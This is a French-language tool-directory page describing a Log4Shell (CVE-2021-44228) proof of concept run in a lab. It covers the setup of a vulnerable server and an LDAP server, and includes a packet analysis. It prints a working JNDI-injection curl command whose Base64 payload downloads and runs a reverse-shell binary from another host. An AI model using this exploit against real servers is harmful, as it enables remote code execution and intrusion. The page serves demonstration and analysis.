Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
LOG4J-CVE-2021-44228 — Preuve de concept pour Log4Shell (CVE-2021-44228) démontrant l'exécution de code à distance via l'injection JNDI, incluant la configuration d'un serveur vulnérable, la commande d'exploitation et l'analyse des paquets. | Kitploit
Outils/GitHubGitHub/sumitpathania03/log4j-cve-2021-44228
Sniffing et Analyse de PaquetsGénération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications WebCommandement et ContrôleArchived
GitHubsumitpathania03/log4j-cve-2021-44228

LOG4J-CVE-2021-44228

Preuve de concept pour Log4Shell (CVE-2021-44228) démontrant l'exécution de code à distance via l'injection JNDI, incluant la configuration d'un serveur vulnérable, la commande d'exploitation et l'analyse des paquets.

Voir le dépôt
8il y a 3 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

LOG4J-CVE-2021-44228

Log4Shell — également connu sous le nom de CVE-2021-44228 — est une vulnérabilité critique qui permet l'exécution de code à distance dans les systèmes utilisant Log4j de la Fondation Apache, qui est une bibliothèque Java open-source largement utilisée dans les produits logiciels commerciaux et open-source ainsi que dans les utilitaires

0_6ImDNNYn_uGlIgog

Analyse du POC

Le serveur vulnérable fonctionne sur le port 8080

Screenshot 2023-04-11 115553

Et le serveur ldap fonctionne sur deux ports : http 8888 et ldap 1389

Screenshot 2023-04-11 115631

COMMANDE D'EXPLOITATION

curl 172.17.0.2:8080 -H 'X-Api-Version: ${jndi:ldap://172.17.0.1:1389/Basic/Command/Base64/d2dldCBodHRwczovLzEwLjAuMi4xNTo4MDAwL3JldiAtTyAvdG1wL3JldiAmJiBjaG1vZCAreCAvdG1wL3JldiAmJiAvdG1wL3Jldg==}'

{

172.17.0.2:8080 -- Adresse IP du serveur vulnérable

172.17.0.1:1389 -- Adresse IP du serveur LDAP

Base64 -- d2dldCBodHRwczovLzEwLjAuMi4xNTo4MDAwL3JldiAtTyAvdG1wL3JldiAmJiBjaG1vZCAreCAvdG1wL3JldiAmJiAvdG1wL3Jldg==

Commande déchiffrée - wget https://10.0.2.15:8000/rev -O /tmp/rev && chmod +x /tmp/rev && /tmp/rev

}

ANALYSE DES PAQUETS

PACKETS

flowgraph

COMME NOUS POUVONS LE VOIR DANS LES PAQUETS, LE SERVEUR ENVOIE UNE REQUÊTE GET POUR UNE CLASSE AU SERVEUR LDAP. SI NOUS VÉRIFIONS LA CLASSE D'EXPLOITATION, NOUS POUVONS VOIR QUE LE SERVEUR LDAP ENVOIE LA COMMANDE DÉCHIFFRÉE DANS LA CLASSE D'EXPLOITATION.

EXP_CLASS

Références

https://github.com/simrotion13/log4shell-vulnerable-app

https://github.com/black9/Log4shell_JNDIExploit.git

Télécharger l’outil